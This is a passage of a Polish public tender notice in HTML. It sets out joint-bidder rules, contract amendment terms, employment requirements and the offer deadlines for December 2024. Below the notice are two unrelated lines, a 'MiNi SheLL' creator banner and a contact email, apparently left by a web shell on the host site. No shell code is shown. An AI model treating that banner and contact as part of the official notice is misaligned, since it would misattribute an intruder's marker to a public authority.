powyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy wzór, którego stanowi załącznik nr 6 do SWZ. <br/>5) Wykonawcy występujący wspólnie winni spełniać łącznie warunki udziału w postępowaniu. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, musi oddzielnie udokumentować fakt, że nie podlega wykluczeniu w zakresie określonym w dokumentach zamówienia. <br/>6) Spółka cywilna (wspólnicy spółki cywilnej) będzie uważana za Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Przez spółkę cywilną należy rozumieć spółkę, <br/>o której mowa w art. 860-875 ustawy z dnia 23 kwietnia 1964 r. Kodeks cywilny. <br/>7) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą, zobowiązani będą przed podpisaniem umowy o udzielenie niniejszego zamówienia, dostarczyć Zamawiającemu umowę regulującą współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 Pzp oraz wskazanym w Projekcie umowy, stanowiącym Załącznik nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ugdl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com